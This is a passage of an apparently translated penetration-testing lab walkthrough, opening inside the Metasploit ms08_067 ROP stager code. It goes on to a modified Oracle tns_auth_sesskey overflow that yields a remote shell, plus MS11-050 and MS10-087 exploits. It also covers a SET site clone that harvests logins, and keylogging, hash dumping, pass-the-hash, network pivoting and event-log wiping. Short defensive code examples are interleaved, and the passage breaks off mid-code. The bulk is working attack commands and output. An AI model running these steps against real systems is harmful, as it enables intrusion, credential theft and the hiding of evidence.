        #  <must complete \x00 two byte opcode>; <free_byte>; jmp $+0x5c
        gadget3 = "\xcc" + free_byte + "\xeb\x5a"
    
        # gadget2:
        #  get eax into edi
        #  adjust edi
        #  get 0x7f in ecx
        #  copy the data
        #  jmp to it
        #
        dws = gadget2.unpack('V*')
    
        ##
        # Create the ROP stager, pfew.. Props to corelanc0d3r!
        # This was no easy task due to space limitations :-/
        # -jduck
        ##
        module_name = 'ACGENRAL.DLL'
        module_base = 0x6f880000
    
        rvasets = {}
        # XP SP2
        rvasets['5.1.2600.2180'] = {
          # call [imp_HeapCreate] / mov [0x6f8b8024], eax / ret
          'call_HeapCreate'                          => 0x21064,
          'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e546,
          'pop ecx / ret'                            => 0x2e546 + 6,
          'mov [eax], ecx / ret'                     => 0xd182,
          'jmp eax'                                  => 0x19b85,
          'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10976,
          'mov [eax+0x10], ecx / ret'                => 0x10976 + 6,
          'add eax, 8 / ret'                         => 0x29a14
        }
    
        # XP SP3
        rvasets['5.1.2600.5512'] = {
          # call [imp_HeapCreate] / mov [0x6f8b02c], eax / ret
          'call_HeapCreate'                          => 0x21286,
          'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e796,
          'pop ecx / ret'                            => 0x2e796 + 6,
          'mov [eax], ecx / ret'                     => 0xd296,
          'jmp eax'                                  => 0x19c6f,
          'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10a56,
          'mov [eax+0x10], ecx / ret'                => 0x10a56 + 6,
          'add eax, 8 / ret'                         => 0x29c64
        }
    
        # HeapCreate ROP Stager from ACGENRAL.DLL 5.1.2600.2180
        rop = [
          # prime ebp (adjustment distance)
          0x00018000,
    
          # get some RWX memory via HeapCreate
          'call_HeapCreate',
          0x01040110, # flOptions (gets & with 0x40005)
          0x01010101,
          0x01010101,
    
          # adjust the returned pointer
          'add eax, ebp / mov ecx, 0x59ffffa8 / ret',
    
          # setup gadget1
          'pop ecx / ret',
          gadget1.unpack('V').first,
          'mov [eax], ecx / ret',
    
          # execute gadget1
          'jmp eax',
    
          # setup gadget2 (via gadget1)
          dws[0],
          dws[1],
          'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret',
    
          # setup part3 of gadget2
          'pop ecx / ret',
          dws[2],
          'mov [eax+0x10], ecx / ret',
    
          # execute gadget2
          'add eax, 8 / ret',
          'jmp eax',
    
          # gadget3 gets executed after gadget2 (luckily)
          gadget3.unpack('V').first
        ]
    
        # convert the meta rop into concrete bytes
        rvas = rvasets[version]
    
        rop.map! { |e|
          if e.kind_of? String
            # Meta-replace (RVA)
            fail_with(Failure::BadConfig, "Unable to locate key: \"#{e}\"") unless rvas[e]
            module_base + rvas[e]
    
          elsif e == :unused
            # Randomize
            rand_text(4).unpack('V').first
    
          else
            # Literal
            e
          end
        }
    
        ret = rop.pack('V*')
    
        # check badchars?
        # idx = Rex::Text.badchar_index(ret, payload_badchars)
    
        ret
      end
    end
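
The relative-path trigger that the exploit and check methods build (a leading "\", a long first component, then "\..\..\") is the whole story of this bug from the defender's side: a canonicalizer that lets the second ".." step before the start of its buffer. The Ruby below is an added example, not code from the ms08_067_netapi module or from Metasploit. It implements a reference canonicalizer that rejects a root escape, plus an inspector for the PathName argument as it travels in the DCERPC stub. Every name in it (to_utf16le, decode_pathname, safe_canonicalize, inspect_pathname, the sample constants) is ours; it assumes Rex::Text.to_unicode produces UTF-16LE, and the sample paths are constructed to mirror the module's shapes, not captured traffic.

```ruby
# Added example: not part of the ms08_067_netapi module above. A reference
# canonicalizer for NetprPathCanonicalize-style paths that refuses to step
# above the root, and a small inspector for the PathName argument as it is
# carried in the DCERPC stub. All names here are ours; the sample paths are
# constructed to mirror the "\..\..\" shape the module's exploit and check
# methods send, not captured traffic.

# Mirrors Rex::Text.to_unicode, which the module uses (assumption: UTF-16LE).
def to_utf16le(str)
  str.encode('UTF-16LE').b
end

# Decode a UTF-16LE PathName; bytes that are not valid UTF-16 (for example a
# payload body) are replaced instead of raising, and the string stops at the
# first NUL terminator, as the module's trailing "\x00" * 2 intends.
def decode_pathname(bytes)
  text = bytes.dup.force_encoding('UTF-16LE')
              .encode('UTF-8', invalid: :replace, undef: :replace)
  text.split("\u0000", 2).first.to_s
end

# Returns [:ok, canonical] or [:error, reason]. A ".." with nothing left to
# pop is rejected here; the vulnerable canonicalizer instead walks back
# before the start of the buffer, which is what the module's "\..\..\"
# trigger relies on.
def safe_canonicalize(path)
  return [:error, :not_rooted] unless path.start_with?('\\')

  stack = []
  path.split('\\').each do |part|
    next if part.empty? || part == '.'

    if part == '..'
      return [:error, :traversal_above_root] if stack.empty?

      stack.pop
    else
      stack << part
    end
  end
  [:ok, '\\' + stack.join('\\')]
end

# Inspect one wire-format PathName and report a verdict a detection rule can
# cite: the decoded path, its canonical form (nil when rejected) and the reason.
def inspect_pathname(utf16le_bytes)
  path = decode_pathname(utf16le_bytes)
  status, detail = safe_canonicalize(path)
  {
    path: path,
    canonical: status == :ok ? detail : nil,
    reason: status == :ok ? nil : detail,
    suspicious: status != :ok
  }
end

# Constructed samples. TRIGGER_SHAPE follows the exploit method's layout with
# 100 'A's standing in for the front buffer and payload; PROBE_SHAPE is the
# path the check method sends; BENIGN is an ordinary share path with one "..".
TRIGGER_SHAPE = to_utf16le('\\' + 'A' * 100 + '\\..\\..\\' + 'ABCDEFG') + "\x00\x00".b
PROBE_SHAPE   = to_utf16le('\\R7\\..\\..\\R7') + "\x00\x00".b
BENIGN        = to_utf16le('\\share\\dir\\..\\file.txt') + "\x00\x00".b

if __FILE__ == $PROGRAM_NAME
  [TRIGGER_SHAPE, PROBE_SHAPE, BENIGN].each do |sample|
    puts inspect_pathname(sample).inspect
  end
end
```

Running the file prints a verdict for each sample. A network rule that decodes the PathName argument of SRVSVC opnum 0x1f (the call both methods above make) and applies the same root-escape check distinguishes the module's probe from an ordinary canonicalization request, because a legitimate client never has more ".." components than directories before them.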
    

    Oracle tns_auth_sesskey

    use exploit/windows/oracle/tns_auth_sesskey
    set payload windows/meterpreter/reverse_tcp
    set RHOSTS 10.10.10.130
    set LHOST 10.10.10.128
    set LPORT 5000
    set target 1
    exploit
    
    msf6 exploit(windows/oracle/tns_auth_sesskey) > exploit
    [*] Started reverse TCP handler on 10.10.10.128:5000
    [*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
    [*] 10.10.10.130:1521 - Sending NSPTCN packet ...
    [*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
    [*] 10.10.10.130:1521 - Sending NA packet ...
    [*] 10.10.10.130:1521 - Sending TTIPRO packet ...
    [*] 10.10.10.130:1521 - Sending TTIDTY packet ...
    [*] 10.10.10.130:1521 - Calling OSESSKEY ...
    [*] 10.10.10.130:1521 - Calling kpoauth with long AUTH_SESSKEY ...
    [*] Exploit completed, but no session was created.
    

    The output reports "no session was created".

    Following the hint in the book, modify the tns_auth_sesskey.rb source code:

    C:\metasploit-framework\embedded\framework\modules\exploits\windows\oracle\tns_auth_sesskey.rb
    
        # build exploit buffer
        print_status("Calling kpoauth with long AUTH_SESSKEY ...")
        sploit = payload.encoded
        sploit << rand_text_alphanumeric(0x19a - 0x17e)
        sploit << generate_seh_record(mytarget.ret)
        distance = payload_space + 8 + 5
        sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
    
        # ensure bad ptr is derefed
        value = rand(0x3fffffff) | 0xc0000000
        sploit[0x17e,4] = [value].pack('V')
    
        # send overflow trigger packet (call kpoauth)
        params = []
        params << {
          'Name'   => 'AUTH_SESSKEY',
          'Value'  => sploit,
          'Flag'   => 1
        }
        dtyauth_pkt = dtyauth_packet(0x73, username, 0x121, params)
        sock.put(dtyauth_pkt)
    

    Change it to:

        # build exploit buffer
        print_status("Calling kpoauth with long AUTH_SESSKEY ...")
        sploit = payload.encoded
        sploit << rand_text_alphanumeric(0x19a - 0x17e + 0x10)
        sploit << generate_seh_record(mytarget.ret)
        distance = payload_space + 8 + 5 + 0x20
        sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
    
        # ensure bad ptr is derefed
        value = rand(0x3fffffff) | 0xc0000000
        sploit[0x17e,4] = [value].pack('V')
    
        # send overflow trigger packet (call kpoauth)
        params = []
        params << {
          'Name'   => 'AUTH_SESSKEY',
          'Value'  => sploit,
          'Flag'   => 1
        }
        dtyauth_pkt = dtyauth_packet(0x73, username, 0x121, params)
        sock.put(dtyauth_pkt)
    

    Start Oracle following the instructions in oracle startup.txt on the desktop:

    C:\oracle\product\10.2.0\db_1\BIN\sqlplus.exe /nolog
    conn sys/mima1234 as sysdba
    startup
    


    msf6 exploit(windows/oracle/tns_auth_sesskey) > rexploit
    [*] Reloading module...
    
    [*] Started reverse TCP handler on 10.10.10.128:5000
    [*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
    [*] 10.10.10.130:1521 - Sending NSPTCN packet ...
    [*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
    [*] 10.10.10.130:1521 - Sending NA packet ...
    [*] 10.10.10.130:1521 - Sending TTIPRO packet ...
    [*] 10.10.10.130:1521 - Sending TTIDTY packet ...
    [*] 10.10.10.130:1521 - Calling OSESSKEY ...
    [*] 10.10.10.130:1521 - Calling kpoauth with long AUTH_SESSKEY ...
    [*] Sending stage (175174 bytes) to 10.10.10.130
    [*] Sending stage (175174 bytes) to 10.10.10.130
    [*] Sending stage (175174 bytes) to 10.10.10.130
    [*] Sending stage (175174 bytes) to 10.10.10.130
    [*] Sending stage (175174 bytes) to 10.10.10.130
    [*] Sending stage (175174 bytes) to 10.10.10.130
    [*] Sending stage (175174 bytes) to 10.10.10.130
    [*] Exploit completed, but no session was created.
    

    The output again reports "no session was created"; switch the payload to windows/shell/bind_tcp:

    use exploit/windows/oracle/tns_auth_sesskey
    set payload windows/shell/bind_tcp
    set RHOSTS 10.10.10.130
    set LHOST 10.10.10.128
    set LPORT 4555
    set target 1
    exploit
    
    msf6 exploit(windows/oracle/tns_auth_sesskey) > exploit
    
    [*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
    [*] 10.10.10.130:1521 - Sending NSPTCN packet ...
    [*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
    [*] 10.10.10.130:1521 - Sending NA packet ...
    [*] 10.10.10.130:1521 - Sending TTIPRO packet ...
    [*] 10.10.10.130:1521 - Sending TTIDTY packet ...
    [*] 10.10.10.130:1521 - Calling OSESSKEY ...
    [*] 10.10.10.130:1521 - Calling kpoauth with long AUTH_SESSKEY ...
    [*] Started bind TCP handler against 10.10.10.130:4555
    [*] Encoded stage with x86/shikata_ga_nai
    [*] Sending encoded stage (267 bytes) to 10.10.10.130
    [*] Command shell session 26 opened (10.10.10.128:3719 -> 10.10.10.130:4555 ) at 2022-04-23 20:10:07 +0800
    
    
    Shell Banner:
    Microsoft Windows [Version 5.2.3790]
    -----
    
    
    C:\oracle\product\10.2.0\db_1\DATABASE>ipconfig
    ipconfig
    
    Windows IP Configuration
    
    
    Ethernet adapter Local Area Connection:
    
       Connection-specific DNS Suffix  . :
       IP Address. . . . . . . . . . . . : 10.10.10.130
       Subnet Mask . . . . . . . . . . . : 255.255.255.0
       Default Gateway . . . . . . . . . : 10.10.10.254
    
    C:\oracle\product\10.2.0\db_1\DATABASE>systeminfo
    systeminfo
    
    Host Name:                 ROOT-TVI862UBEH
    OS Name:                   Microsoft(R) Windows(R) Server 2003, Enterprise Edition
    OS Version:                5.2.3790 Build 3790
    OS Manufacturer:           Microsoft Corporation
    OS Configuration:          Standalone Server
    OS Build Type:             Uniprocessor Free
    Registered Owner:          root
    Registered Organization:
    Product ID:                69713-640-9722366-45109
    Original Install Date:     11/15/2011, 9:50:15 PM
    System Up Time:            242 Days, 0 Hours, 52 Minutes, 4 Seconds
    System Manufacturer:       VMware, Inc.
    System Model:              VMware Virtual Platform
    System Type:               X86-based PC
    Processor(s):              1 Processor(s) Installed.
                               [01]: x86 Family 6 Model 14 Stepping 10 GenuineIntel ~2112 Mhz
    BIOS Version:              INTEL  - 6040000
    Windows Directory:         C:\WINDOWS
    System Directory:          C:\WINDOWS\system32
    Boot Device:               \Device\HarddiskVolume1
    System Locale:             en-us;English (United States)
    Input Locale:              en-us;English (United States)
    Time Zone:                 (GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi
    Total Physical Memory:     767 MB
    Available Physical Memory: 67 MB
    Page File: Max Size:       2,474 MB
    Page File: Available:      1,295 MB
    Page File: In Use:         1,179 MB
    Page File Location(s):     C:\pagefile.sys
    Domain:                    WORKGROUP
    Logon Server:              N/A
    Hotfix(s):                 3 Hotfix(s) Installed.
                               [01]: File 1
                               [02]: Q147222
                               [03]: KB893803v2 - Update
    Network Card(s):           1 NIC(s) Installed.
                               [01]: Intel(R) PRO/1000 MT Network Connection
                                     Connection Name: Local Area Connection
                                     DHCP Enabled:    No
                                     IP address(es)
                                     [01]: 10.10.10.130
    

    Client-side penetration

    MS11050

    search ms11_050
    
    use exploit/windows/browser/ms11_050_mshtml_cobjectelement
    set payload windows/meterpreter/reverse_http
    set SRVHOST 0.0.0.0
    set SRVPORT 8080
    set LHOST 10.10.10.128
    set LPORT 4444
    set target 1
    set URIPATH ms11050
    exploit
    
    msf6 exploit(windows/browser/ms11_050_mshtml_cobjectelement) > exploit
    [*] Started reverse TCP handler on 10.10.10.128:4444
    [*] Using URL: http://10.10.10.128:8080/ms11050
    [*] Server started.
    

    The output indicates that the target must visit the following URL:

    http://10.10.10.128:8080/ms11050
    

    The target ships with IE6 rather than the vulnerable IE7, so IE7 must be downloaded before visiting the URL:
    https://www.download3k.com/Install-Internet-Explorer.html
    https://www.microsoft.com/ja-jp/download/details.aspx?id=41071

    Visit the URL in IE7:

    http://10.10.10.128:8080/ms11050
    

    Metasploit receives the following:

    [*] 192.168.10.128   ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)...
    

    No access was obtained; there may be a problem with the IE7 installer.

    After changing the target to Windows 7 with IE8, the browser crashed but still no access was obtained.


    MS10087

    search ms10_087
    
    use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
    set payload windows/exec
    set CMD calc.exe
    set FILENAME ms10087.rtf
    exploit
    
    msf6 > search ms10_087
    
    Matching Modules
    ================
    
       #  Name                                                    Disclosure Date  Rank   Check  Description
       -  ----                                                    ---------------  ----   -----  -----------
       0  exploit/windows/fileformat/ms10_087_rtf_pfragments_bof  2010-11-09       great  No     MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
    
    
    Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
    
    msf6 > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
    [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
    msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set payload windows/exec
    payload => windows/exec
    msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set CMD calc.exe
    CMD => calc.exe
    msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set FILENAME ms10087.rtf
    FILENAME => ms10087.rtf
    msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > exploit
    
    [*] Creating 'ms10087.rtf' file ...
    [+] ms10087.rtf stored at C:/Users/IDEA/.msf4/local/ms10087.rtf
    

    The output shows the file path:

    C:/Users/IDEA/.msf4/local/ms10087.rtf
    

    Locate this file on the system, copy it to the WinXP Metasploitable target machine and double-click it; this is the step where the target is lured into opening the file.

    After the double-click, WinXP Metasploitable launches the calculator program set in the payload.

    Social engineering

    Phishing site

    http://10.10.10.129/signin.html
    

    Install the SET tool in Kali Linux to clone the web interface:

    apt-get -y install set
    

    Run SET:

    setoolkit
    
    root@DESKTOP-9I2FBB4:~# setoolkit
                  ________________________
                  __  ___/__  ____/__  __/
                  _____ \__  __/  __  /
                  ____/ /_  /___  _  /
                  /____/ /_____/  /_/
    
    [---]        The Social-Engineer Toolkit (SET)         [---]
    [---]        Created by: David Kennedy (ReL1K)         [---]
                          Version: 8.0.3
                        Codename: 'Maverick'
    [---]        Follow us on Twitter: @TrustedSec         [---]
    [---]        Follow me on Twitter: @HackingDave        [---]
    [---]       Homepage: https://www.trustedsec.com       [---]
            Welcome to the Social-Engineer Toolkit (SET).
             The one stop shop for all of your SE needs.
    
       The Social-Engineer Toolkit is a product of TrustedSec.
    
               Visit: https://www.trustedsec.com
    
       It's easy to update using the PenTesters Framework! (PTF)
    Visit https://github.com/trustedsec/ptf to update all your tools!
    set>
    
     Select from the menu:
    
       1) Social-Engineering Attacks
       2) Penetration Testing (Fast-Track)
       3) Third Party Modules
       4) Update the Social-Engineer Toolkit
       5) Update SET configuration
       6) Help, Credits, and About
    
      99) Exit the Social-Engineer Toolkit
    

    Select 1) Social-Engineering Attacks

    1
    

    Output

     Select from the menu:
    
       1) Spear-Phishing Attack Vectors
       2) Website Attack Vectors
       3) Infectious Media Generator
       4) Create a Payload and Listener
       5) Mass Mailer Attack
       6) Arduino-Based Attack Vector
       7) Wireless Access Point Attack Vector
       8) QRCode Generator Attack Vector
       9) Powershell Attack Vectors
      10) Third Party Modules
    
      99) Return back to the main menu.
    

    Select 2) Website Attack Vectors

    2
    

    Output

       1) Java Applet Attack Method
       2) Metasploit Browser Exploit Method
       3) Credential Harvester Attack Method
       4) Tabnabbing Attack Method
       5) Web Jacking Attack Method
       6) Multi-Attack Web Method
       7) HTA Attack Method
    
      99) Return to Main Menu
    

    Select 3) Credential Harvester Attack Method

    3
    

    Output

       1) Web Templates
       2) Site Cloner
       3) Custom Import
    
      99) Return to Webattack Menu
    

    Select 2) Site Cloner

    2
    

    Prompt (accept the default, the attacker host's own IP address)

    set:webattack> IP address for the POST back in Harvester/Tabnabbing [10.10.10.128]:
    

    Prompt

    set:webattack> Enter the url to clone:
    

    Enter the URL to clone

    http://10.10.10.129/signin.html
    
    set:webattack> Enter the url to clone:http://10.10.10.129/signin.html
    
    [*] Cloning the website: http://10.10.10.129/signin.html
    [*] This could take a little bit...
    
    The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
    [*] The Social-Engineer Toolkit Credential Harvester Attack
    [*] Credential Harvester is running on port 80
    [*] Information will be displayed to you as it arrives below:
    

    Visit the cloned URL (the attacker host, which is now serving the copy on port 80)

    http://10.10.10.128/
    


    Output

    10.10.10.128 - - [17/Apr/2022 11:42:06] "GET / HTTP/1.1" 200 -
    

    Enter a username and password on the cloned page.
    After submission, the browser is redirected to the real address.
    Output: the username and password entered on the cloned page have been captured

    [*] WE GOT A HIT! Printing the output:
    POSSIBLE USERNAME FIELD FOUND: username=admin
    POSSIBLE PASSWORD FIELD FOUND: password=admin
    POSSIBLE USERNAME FIELD FOUND: Login=Login
    [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
    

    Post-exploitation

    Metasploit's post-exploitation modules are used once an exploit has obtained remote control of the target system; they carry out a range of post-exploitation actions on the compromised system, such as gathering sensitive information, expanding access further, and pivoting through the host. In the post-exploitation phase Metasploit relies mainly on post (post-exploitation) modules.
    post (post-exploitation modules): once access has been obtained, continue the penetration against the target and its internal network.

    Information gathering

    The dumplinks module retrieves recently used files and access records (from the user's .lnk shortcut files)

    run post/windows/gather/dumplinks
    
    meterpreter > run post/windows/gather/dumplinks
    
    [*] Running module against DH-CA8822AB9589
    [*] Running as SYSTEM extracting user list...
    [*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
    [*] Processing: C:\Documents and Settings\Administrator\Recent\0927.pdf.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\1.html.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\Copy of kingview.html.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\IIS6.CAB.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\IIS_XPSP3.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\IMS.CAB.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\kingview.html.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\KingView.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\KVWebSvr.dll.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\msf.pdf.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\New Text Document (2).txt.lnk.
    [*] Processing: C:\Documents and Settings\Administrator\Recent\New Text Document.txt (10).lnk.
    

    The enum_applications module lists installed software, security updates and patches

    run post/windows/gather/enum_applications
    
    meterpreter > run post/windows/gather/enum_applications
    
    [*] Enumerating applications installed on DH-CA8822AB9589
    
    Installed Applications
    ======================
    
     Name                                    Version
     ----                                    -------
     Adobe Reader 9                          9.0.0
     KingView 6.53                           6.53
     KingView Driver                         6.53
     Microsoft Office Standard Edition 2003  11.0.8173.0
     Sentinel Protection Installer 7.5.0     7.5.0
     VMware Tools                            8.1.4.11056
     WebFldrs XP                             9.50.7523
    
    
    [+] Results stored in: C:/Users/IDEA/.msf4/loot/20220417155003_default_192.168.10.128_host.application_916948.txt
    

    keyscan captures keystrokes

    keyscan_start
    keyscan_dump
    keyscan_stop
    

    sniffer captures network traffic (for example to recover passwords sent in the clear)

    use sniffer
    
    sniffer_interfaces
    
    sniffer_start 1
    
    sniffer_dump 1 C:\Users\IDEA\Downloads\cap1.pcap
    
    sniffer_stop 1
    
    meterpreter > use sniffer
    Loading extension sniffer...Success.
    meterpreter > sniffer_interfaces
    1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
    meterpreter > sniffer_start 1
    [*] Capture started on interface 1 (50000 packet buffer)
    meterpreter > sniffer_dump 1 C:\Users\IDEA\Downloads\cap1.pcap
    [*] Flushing packet capture buffer for interface 1...
    [*] Flushed 8 packets (1174 bytes)
    [*] Downloaded 100% (1174/1174)...
    [*] Download completed, converting to PCAP...
    [*] PCAP file written to C:UsersIDEADownloadscap1.pcap
    meterpreter > sniffer_stop 1
    [*] Capture stopped on interface 1
    [*] There are 0 packets (0 bytes) remaining
    [*] Download or release them using 'sniffer_dump' or 'sniffer_release'
    

    The enum_ie module retrieves passwords cached by the IE browser

    run post/windows/gather/enum_ie
    
    meterpreter > run post/windows/gather/enum_ie
    
    [*] IE Version: 6.0.2900.5512
    [-] This module will only extract credentials for >= IE7
    [*] Retrieving history.....
    [*] Retrieving cookies.....
    [*] Looping through history to find autocomplete data....
    [-] No autocomplete entries found in registry
    [*] Looking in the Credential Store for HTTP Authentication Creds...
    

    hashdump retrieves the system's password hashes (one line per account: user:RID:LM hash:NT hash:::)

    hashdump
    
    meterpreter > hashdump
    Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
    IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::
    IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::
    
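    An added example (not part of the original post) that audits a hashdump listing in the format shown above: it rejects malformed hashes (a raw LM or NT hash is always 32 hex characters), flags accounts with a blank password, and flags accounts that still store an LM hash, using the well-known empty-LM and empty-NT hash constants. The sample input is a subset of the output above.

```python
import re

# Added example, not part of the original post. Audits a hashdump/pwdump
# listing (user:RID:LM:NT:::) for weak credential storage.
# Constants below are the well-known hashes of an empty LM / empty NT password.
EMPTY_LM_HALF = "aad3b435b51404ee"    # LM hash of one empty 7-character half
EMPTY_LM = EMPTY_LM_HALF * 2          # LM hash of an empty password (both halves)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Sample input: a subset of the hashdump output shown above.
HASHDUMP = """\
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
"""

def is_valid_hash(h):
    """A raw LM or NT hash is exactly 32 hex characters (16 bytes)."""
    return bool(HEX32.match(h.lower()))

def parse_hashdump(text):
    """Return a list of (user, rid, lm, nt); reject malformed lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        fields = line.split(":")
        if len(fields) < 4 or not (is_valid_hash(fields[2]) and is_valid_hash(fields[3])):
            raise ValueError(f"malformed hashdump line: {line!r}")
        records.append((fields[0], int(fields[1]), fields[2].lower(), fields[3].lower()))
    return records

def audit(text):
    """Map each account that has a weakness to the list of findings for it."""
    findings = {}
    for user, rid, lm, nt in parse_hashdump(text):
        issues = []
        if nt == EMPTY_NT:
            issues.append("blank password")
        if lm != EMPTY_LM:
            # A stored LM hash means NoLMHash is not enforced and the password is <= 14 chars.
            issues.append("LM hash stored")
            if lm[16:] == EMPTY_LM_HALF:
                # Second LM half equals the empty-half constant: password is 7 chars or fewer.
                issues.append("password is 7 characters or fewer")
        if issues:
            findings[user] = issues
    return findings

if __name__ == "__main__":
    for user, issues in audit(HASHDUMP).items():
        print(f"{user}: {', '.join(issues)}")
```

    The Guest line above is the empty-LM/empty-NT pair, so it is reported as a blank password, and the second half of the Administrator LM hash reveals a password of at most 7 characters.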

    Internal network expansion

    Get the local subnets

    run get_local_subnets
    
    meterpreter > run get_local_subnets
    
    [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
    [!] Example: run post/multi/manage/autoroute OPTION=value [...]
    Local subnet: 10.10.10.0/255.255.255.0
    Local subnet: 192.168.10.0/255.255.255.0
    

    Background the session

    background
    
    meterpreter > background
    [*] Backgrounding session 1...
    msf6 exploit(windows/smb/ms08_067_netapi) > sessions
    
    Active sessions
    ===============
    
      Id  Name  Type                     Information                            Connection
      --  ----  ----                     -----------                            ----------
      1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DH-CA8822AB9589  192.168.10.1:24066 -> 192.168.10.128:5000  (192.168.10.128)
    
    msf6 exploit(windows/smb/ms08_067_netapi) > sessions 1
    [*] Starting interaction with 1...
    
    meterpreter >
    

    View the routing table

    route print
    

    Add a route through the session

    route add 192.168.10.0 255.255.255.0 1
    
    msf6 exploit(windows/smb/ms08_067_netapi) > route print
    [*] There are currently no routes defined.
    msf6 exploit(windows/smb/ms08_067_netapi) > route add 192.168.10.0 255.255.255.0 1
    [*] Route added
    msf6 exploit(windows/smb/ms08_067_netapi) > route print
    
    IPv4 Active Routing Table
    =========================
    
       Subnet             Netmask            Gateway
       ------             -------            -------
       192.168.10.0       255.255.255.0      Session 1
    
    [*] There are currently no IPv6 routes defined.
    

    Credential reuse (psexec with the dumped hash as SMBPass)

    use exploit/windows/smb/psexec
    set payload windows/meterpreter/bind_tcp
    set LHOST 10.10.10.128
    set LPORT 443
    set RHOST 192.168.10.128
    set SMBUser Administrator
    set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cb
    exploit
    
    msf6 > use exploit/windows/smb/psexec
    [*] Using configured payload windows/upexec/reverse_tcp
    msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
    payload => windows/meterpreter/bind_tcp
    msf6 exploit(windows/smb/psexec) > set LHOST 10.10.10.128
    LHOST => 10.10.10.128
    msf6 exploit(windows/smb/psexec) > set LPORT 443
    LPORT => 443
    msf6 exploit(windows/smb/psexec) > set RHOST 192.168.10.128
    RHOST => 192.168.10.128
    msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
    SMBUser => Administrator
    msf6 exploit(windows/smb/psexec) > set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cb
    SMBPass => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
    msf6 exploit(windows/smb/psexec) > exploit
    
    [*] 192.168.10.128:445 - Connecting to the server...
    [*] 192.168.10.128:445 - Authenticating to 192.168.10.128:445 as user 'Administrator'...
    [-] 192.168.10.128:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
    [*] Exploit completed, but no session was created.
    

    Covering tracks

    Clear event log traces

    clearev
    
    meterpreter > clearev
    [*] Wiping 327 records from Application...
    [*] Wiping 518 records from System...
    [*] Wiping 0 records from Security...
    
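    The defender's counterpart to the clearing shown above, as an added example that is not part of the original post: Windows records the clearing itself (Security log: event 1102 on Vista and later, 517 on XP/2003; System log: event 104 on Vista and later), so a channel whose oldest surviving record is that event is a strong sign that everything before it was wiped. The events are constructed sample records, not real logs.

```python
from collections import defaultdict

# Added example, not part of the original post: detect event-log clearing,
# the footprint that a 'clearev' leaves behind.
LOG_CLEAR_SIGNATURES = {
    ("Security", 1102),  # "The audit log was cleared" (Vista and later)
    ("Security", 517),   # the same event on Windows XP / Server 2003
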